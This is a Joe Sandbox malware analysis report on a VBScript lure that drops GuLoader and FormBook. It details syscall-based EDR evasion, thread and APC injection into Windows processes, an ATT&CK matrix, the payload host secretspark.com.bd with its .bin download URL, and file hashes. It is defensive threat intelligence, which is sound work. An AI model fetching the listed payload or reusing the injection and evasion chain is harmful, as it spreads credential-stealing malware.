        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D48470 mov eax, dword ptr fs:[00000030h]3_2_32D48470
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D48470 mov eax, dword ptr fs:[00000030h]3_2_32D48470
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFF478 mov eax, dword ptr fs:[00000030h]3_2_32DFF478
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFF409 mov eax, dword ptr fs:[00000030h]3_2_32DFF409
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3640D mov eax, dword ptr fs:[00000030h]3_2_32D3640D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D77425 mov eax, dword ptr fs:[00000030h]3_2_32D77425
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D77425 mov ecx, dword ptr fs:[00000030h]3_2_32D77425
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DCF42F mov eax, dword ptr fs:[00000030h]3_2_32DCF42F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DCF42F mov eax, dword ptr fs:[00000030h]3_2_32DCF42F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DCF42F mov eax, dword ptr fs:[00000030h]3_2_32DCF42F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DCF42F mov eax, dword ptr fs:[00000030h]3_2_32DCF42F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DCF42F mov eax, dword ptr fs:[00000030h]3_2_32DCF42F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3B420 mov eax, dword ptr fs:[00000030h]3_2_32D3B420
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC9429 mov eax, dword ptr fs:[00000030h]3_2_32DC9429
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D765D0 mov eax, dword ptr fs:[00000030h]3_2_32D765D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7C5C6 mov eax, dword ptr fs:[00000030h]3_2_32D7C5C6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F5C7 mov eax, dword ptr fs:[00000030h]3_2_32D3F5C7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F5C7 mov eax, dword ptr fs:[00000030h]3_2_32D3F5C7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F5C7 mov eax, dword ptr fs:[00000030h]3_2_32D3F5C7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F5C7 mov eax, dword ptr fs:[00000030h]3_2_32D3F5C7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F5C7 mov eax, dword ptr fs:[00000030h]3_2_32D3F5C7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F5C7 mov eax, dword ptr fs:[00000030h]3_2_32D3F5C7

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Benign windows process drops PE files
        Source: C:\Windows\System32\wscript.exeFile created: temp_executable.exe.0.drJump to dropped file
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x4C11373Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeNtResumeThread: Indirect: 0x32A43E8DJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeNtQueueApcThread: Indirect: 0x32A3F626Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFE38E59E7F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtMapViewOfSection: Direct from: 0x4C09666Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtMapViewOfSection: Direct from: 0x4C096AAJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFE6B3E2651Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeNtSetContextThread: Indirect: 0x32A4386DJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x4C09745Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x4C097BCJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x4C0956EJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeNtSuspendThread: Indirect: 0x32A43B7DJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\temp_executable.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread register set: target process: 7620Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeThread register set: target process: 7620Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,2_2_004036D7
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information121
        Scripting        		Valid Accounts1
        Native API        		121
        Scripting        		1
        Access Token Manipulation        		2
        Virtualization/Sandbox Evasion        		OS Credential Dumping121
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution        		1
        DLL Side-Loading        		311
        Process Injection        		1
        Access Token Manipulation        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Clipboard Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		311
        Process Injection        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		1
        Deobfuscate/Decode Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Abuse Elevation Control Mechanism        		LSA Secrets2
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
        Obfuscated Files or Information        		Cached Domain Credentials14
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518414 Sample: Zeskanowana lista przedmiot... Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 35 secretspark.com.bd 2->35 43 Malicious sample detected (through community Yara rule) 2->43 45 Yara detected FormBook 2->45 47 Yara detected GuLoader 2->47 49 Sigma detected: WScript or CScript Dropper 2->49 11 wscript.exe 2 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\temp_executable.exe, PE32 11->31 dropped 69 Benign windows process drops PE files 11->69 71 VBScript performs obfuscated calls to suspicious functions 11->71 73 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->73 15 temp_executable.exe 1 26 11->15         started        signatures6 process7 file8 33 C:\Users\user\AppData\Local\...\System.dll, PE32 15->33 dropped 39 Found stalling execution ending in API Sleep call 15->39 41 Switches to a custom stack to bypass stack traces 15->41 19 temp_executable.exe 6 15->19         started        signatures9 process10 dnsIp11 37 secretspark.com.bd 170.249.236.53, 443, 49755 PRIVATESYSTEMSUS United States 19->37 51 Modifies the context of a thread in another process (thread injection) 19->51 53 Maps a DLL or memory area into another process 19->53 55 Queues an APC in another process (thread injection) 19->55 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 23 RAVCpl64.exe 19->23 injected signatures12 process13 signatures14 59 Maps a DLL or memory area into another process 23->59 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 26 cmdkey.exe 23->26         started        process15 signatures16 63 Modifies the context of a thread in another process (thread injection) 26->63 65 Maps a DLL or memory area into another process 26->65 67 Switches to a custom stack to bypass stack traces 26->67 29 explorer.exe 58 1 26->29 injected process17

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Zeskanowana lista przedmiot#U00f3w nr 84329.vbs5%ReversingLabs

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\temp_executable.exe8%ReversingLabsWin32.Trojan.Generic

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.quovadis.bm00%Avira URL Cloudsafe
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        http://crl.mU0%Avira URL Cloudsafe
        https://secretspark.com.bd/TkFvuYGGiJLZuopqvpi7.bin0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        secretspark.com.bd
        		170.249.236.53
        		truefalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://secretspark.com.bd/TkFvuYGGiJLZuopqvpi7.binfalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.quovadis.bm0temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://ocsp.quovadisoffshore.com0temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.mUtemp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          170.249.236.53
          		secretspark.com.bdUnited States
          		63410PRIVATESYSTEMSUSfalse

          General Information

          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1518414
          Start date and time:2024-09-25 17:17:47 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 17m 42s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:5
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:2
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Zeskanowana lista przedmiot#U00f3w nr 84329.vbs
          Detection:MAL
          Classification:mal100.troj.evad.winVBS@7/11@1/1
          EGA Information:
          • Successful, ratio: 75%
          HCA Information:
          • Successful, ratio: 81%
          • Number of executed functions: 54
          • Number of non-executed functions: 327
          Cookbook Comments:
          • Found application associated with file extension: .vbs
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: Zeskanowana lista przedmiot#U00f3w nr 84329.vbs

          Simulations

          Behavior and APIs

          TimeTypeDescription
          11:21:25API Interceptor11555960x Sleep call for process: cmdkey.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          170.249.236.53Gescanntes Artikelliste_Bestellnummer 25477.vbsGet hashmaliciousFormBook, GuLoaderBrowse

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            secretspark.com.bdGescanntes Artikelliste_Bestellnummer 25477.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 170.249.236.53

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            PRIVATESYSTEMSUSGescanntes Artikelliste_Bestellnummer 25477.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 170.249.236.53
            https://catch35.com/Get hashmaliciousUnknownBrowse
            • 162.246.59.110
            https://www.isobuster.com/dl.php?d=isobuster.com&v=3&l=0Get hashmaliciousUnknownBrowse
            • 104.193.109.63
            firmware.armv4l.elfGet hashmaliciousUnknownBrowse
            • 192.196.159.200
            firmware.armv5l.elfGet hashmaliciousUnknownBrowse
            • 192.196.159.200
            firmware.x86_64.elfGet hashmaliciousUnknownBrowse
            • 170.249.206.146
            NEW.P.ORDER .ENQUIRY56433.PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
            • 170.249.217.170
            https://content.app-us1.com/LedEn/2024/08/03/19c502f2-d7fc-4021-b067-e9b1cf078dac.pdfGet hashmaliciousHTMLPhisherBrowse
            • 158.106.129.201
            b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
            • 158.106.138.119
            93g0DCqh1e.elfGet hashmaliciousMiraiBrowse
            • 162.255.160.105

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
            • 170.249.236.53
            file.exeGet hashmaliciousLummaC, VidarBrowse
            • 170.249.236.53
            SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
            • 170.249.236.53
            D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 170.249.236.53
            cDErPwSuCB.exeGet hashmaliciousUnknownBrowse
            • 170.249.236.53
            tpq.ps1Get hashmaliciousUnknownBrowse
            • 170.249.236.53
            Kv1tZKstAC.exeGet hashmaliciousUnknownBrowse
            • 170.249.236.53
            z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
            • 170.249.236.53
            Swift_Copy_401812_301823-30391_#9812_9202938.exeGet hashmaliciousGuLoader, PureLog StealerBrowse
            • 170.249.236.53
            117532123_20240925-9_MCZB#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
            • 170.249.236.53

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dllmbdcKkZ3Ag.exeGet hashmaliciousGuLoaderBrowse
              mbdcKkZ3Ag.exeGet hashmaliciousGuLoaderBrowse
                mydreamudpate.htaGet hashmaliciousCobalt Strike, GuLoaderBrowse
                  Thermo Fisher RFQ_TFS-1507.xlsGet hashmaliciousGuLoaderBrowse
                    BCXV7eBAlV.exeGet hashmaliciousGuLoaderBrowse
                      W9RpT8yapE.htaGet hashmaliciousCobalt Strike, GuLoaderBrowse
                        BCXV7eBAlV.exeGet hashmaliciousGuLoaderBrowse
                          AWB 9869692024 Clearance Doc.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            AWB 9869692024 Clearance Doc.exeGet hashmaliciousGuLoaderBrowse

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Akre.txt

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):417
                              Entropy (8bit):4.274706417309361
                              Encrypted:false
                              SSDEEP:12:7MHAjnXdcHoZQT/D2SmyDL0MXCWj6nKAdUqVM2KT5O4/K:7MgTtJm/D5TRXCWj6KeM5k
                              MD5:378A24843EDB12C44215291AF484EE67
                              SHA1:B4DED39F643CBC9520824C38BAC8D0F6059EE7C5
                              SHA-256:319E0E8A595D2D1135C32AD2027F15B214B5828743104F6BA0032A0BA2102F35
                              SHA-512:D2AC03123DA17450B86F83EB6785DAEDF799579A15D8478FDCCBBE846D95CE56BB4C86DE9F1991715E12DFD97D4F83D11035C64F0720B5C407E60CD445A34C9C
                              Malicious:false
                              Reputation:low
                              Preview:skied oeillet mortalities.afstdningerne fustily gullibility udkrer fatalisters chapelmaster.trkningsrettigheders proletariserer whitecapping skifters clearers piprinae unfusibness erne munity spairge bella..depoters stonily dvrgeflok unprejudicial.besmudses jocker extremism forhoret thermit trforarbejdning.ribgrasses polyaemic closish lixene gunvers sprjtelakeringers speeling growler laurotetanine unsectarianize..

                              C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Consociation.Bal

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):432938
                              Entropy (8bit):2.6512332223770243
                              Encrypted:false
                              SSDEEP:1536:etn0nQdlo4kvAtpfP9aed6J+pq24l7m3cKDMxWwUnhrGyTMZvbQAsLLGRhSFdID1:gu2/9nsMMTnes2JVtjLFqc13L9XA
                              MD5:5D24DAE263529341D2F078186AD22099
                              SHA1:7A57D1132640DB3482AB3695199DA716432AE5C3
                              SHA-256:52B052B70FE669D4A7E5539E38DE5F1CC27643C3E9E3B2534B181239FA9D81D8
                              SHA-512:5669BB21C1CD95DA1FFDA960EFA87B1F9E388D4399F74C0024FF6DB7623B1185B1B1186C4F2925A7B9F936EC5503EB39F9939CD3B2EE54E7BBAEE12773CCA8E4
                              Malicious:false
                              Reputation:low
                              Preview:00E7000000000000000000310000F5009797003C3C3C3C000000009E002F2F000000000000838300818181810000C3C300F9F9F9F9F9000086860000009F9F000000E20021005B006A006C000000CA00003030300012003434006800282800010000450000636363003B000C0C0C001515000000DCDC0000000000E1E1E1E1E10000003000000000008D8D000000D600380000000066000000E7E700009D00AD00E400000000700072727272727272002A2A2A00BDBD0043430000560036363636002E000071717171000200009C0000181818181818181818181800000000C2000000A80000AE00230000999900D20000AA0066666666660000C700A6A6A60000000000000000000000000000000B007C009500E3003C3C3C3C000000F9F9004B000000000000CD000500007C00000000A600C9C9000035000909006161000067000000000C0C00F9004100C100C100009C9C9C9C00BDBD0000BB002828003C3C000030300000DC00BB007500515151001D00C4009797000000009A9A00430000C3C300DBDB0000000000000C00E2E2E2E200F60000ECECEC001D00E200FC00151515003100D300001000A0A000E6E600000000FDFD009191000096000000000000000000000A00000000EAEA00000000000017005959001F1F003A00FB00002800960000AD00D1D100E4E4E400000E00868600

                              C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Elvi.jud

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):213490
                              Entropy (8bit):7.539520753048367
                              Encrypted:false
                              SSDEEP:6144:TejneZDOvhWjwEqg8T+a4PKtH9t6vqcG/Zgypl:Ci8vAj5aLY+76ycN2
                              MD5:A80B7D073152513AB1FB5BA43502B497
                              SHA1:9B8735FE1B2FBFDC6A1408F07204EC4B952C54D4
                              SHA-256:311EFC86FA1DE90700448135CE390AF44777E0AF9571DB610624162CD9E98639
                              SHA-512:27FA195D2DFA2DCA849B58F7979DBC2421ECDB3D1F0BC8325E60DBBB69CF60FB62D254C3689AFCC07067AA29B863A17C96A19C66FBD8A1C178DB0C9D4839B360
                              Malicious:false
                              Preview:..aa.....S...........22...........2...................................>>........'....o............. .......................:.........`......>>>>>..ee..[.~.88.....................................................g.99.VV.''''......3....I......zzz......f..........h................aaa..........T........z.`.......F.............ssss..........p.......................]]...f.............EE.....^.m...*....>...N......$$$$.......||...........L..cc....}}}}.p.........`..@.JJJJJJJ.....^.......).......................................^^^..........................YY...T....RRR...g.....W........................4444......g..........<<<<<..............._..............DD.................................L. ...D.||.v....................................r....................u............::.3...j....qqq............O....................;...................NN......c.................999......VV..~.2222............A......vv...............XX.BB.P.....f.....$$$$$.p.........PP...UUU..$$.........zz...................

                              C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Syndicship.que

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:Matlab v4 mat-file (little endian) \303, numeric, rows 0, columns 0
                              Category:dropped
                              Size (bytes):445365
                              Entropy (8bit):1.2531729362980937
                              Encrypted:false
                              SSDEEP:1536:Cz29hF2g6bysiKqtRjiEfCJbAyqaBPOPmkc9K:M4AA1Tjv48+Gx
                              MD5:4E4F70B2CEA5AC857D3050A4E21F6832
                              SHA1:E46EE1C0F65E8245A045E599656E7757CD6984C8
                              SHA-256:BFE411D37145804B07CA1447AA79692CAB7DBF29084A1807B645B7947BC71C96
                              SHA-512:ADB8200F06E7DFF9BA34017865A3951471E32778EDAC3841BB598CB4E5A2A1E6B91D6CD8EFCF127B2486E53AD466B76CCE4B0563FE6D8D348B22EC0E79E0E726
                              Malicious:false
                              Preview:..................................................U......................................................................................................................'....................................................L.............................................................:..@..................q........Y......................................7}...............................................3...............................................................................................=.......................&............m.Z................A.......................................................P.......................................................................................v........<`............................................................q.............+.......t...........|..9......Q..9.......................................................0..................7..........................................................................................................

                              C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic\gennemsynenes.jal

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):335577
                              Entropy (8bit):1.2535113458554008
                              Encrypted:false
                              SSDEEP:1536:GruBqYqvmx037bWZiy1+1Z02AdwwS/21ujY60Y:WqqYqvyCWC02eUR
                              MD5:483D45AD053613D0866F1BFA1ADD2CC1
                              SHA1:B07481BF677FA9E9BAAD80F3AC6A96D03DADB056
                              SHA-256:F133E0B6BB313AC42AA7DE46CCA592289413FA3D6EB7757894C139059799B95D
                              SHA-512:E72575F2A3C59A77DF2C05F124E4662ABED3C6F63B2A815306AB6759BA989B0DB9BEF161D0CBC2D6BAF69E3456C2E67F474079BA8053F833B800C952416BB965
                              Malicious:false
                              Preview:..........................................................................N..................t.....P..../..(................................k.J..................,....=.........................p.................'............................t............................4.................6.............O...................................p...............................................y...................................................................i........................2...................0......+........................................................C..............................................7............................................%................5......................."..U....Y............................-........v......b.......................................................4...+.6...............>.................................................................................................................. .................................r.........N.......-.x....

                              C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic\metronomic.bee

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):300328
                              Entropy (8bit):1.2422311481187949
                              Encrypted:false
                              SSDEEP:768:JQz4Z/a8KR85+UI1fuw3jm2+TDHwfg/fd1rmKk6MJalXXIkre458MpDLwvYzuMqz:e8KvSPbXBvp8AS2TZ96JmAh
                              MD5:F57039F8803F4EB89D3FCDA8DCC73F68
                              SHA1:539021FE70AA56B90B3C51A8C736B4823C29C178
                              SHA-256:5EFA3FF183AFBD47121C35430E18346712B28A4B503F43B10051996C26857D8A
                              SHA-512:F1AF0F61A7F4FEAB932788A4CF4A0345994CF8F65E450AD40C89D067F14FE236478D843559FAE5E6175636D44BB669F8224B2DFAC6345ACC2E1B208C23FA73C5
                              Malicious:false
                              Preview:...5....................................../.........................................................................$..........................................................G.................................E..................................V....Y......................"....F.......................................................u..........................>................Y....................................................r.......................G.......=.......[..........................8..................................B..............................................................7...........................E....P......h..........................................B........z......................................................s..........C........o.....................................p....../........................................................................................)................B....................................................................................C.

                              C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic\nontruancy.far

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):14991
                              Entropy (8bit):1.2730906934586605
                              Encrypted:false
                              SSDEEP:96:86MWYAl+kypSdltIrchSHlyxQid21fX2W/5EeW+Y:86rYA+kTh3h4id21fGG5EeW+Y
                              MD5:50FAD5C454CB963B9FE90E52C94D7D1E
                              SHA1:FAE94575F9F01D4C7EA5B71B33CE5C20E8F58780
                              SHA-256:E1313B78830D596DAC0FA2BFE8801FD6E539DF8D1614CFAAC76712407F68646C
                              SHA-512:C68B05A2E35E16733B966347E441E26531B1A6A9A777976E93F81191951110478490978B3D667F6E47AB4B271B9AD657F14F1834F0E085F0C238C5322E20743C
                              Malicious:false
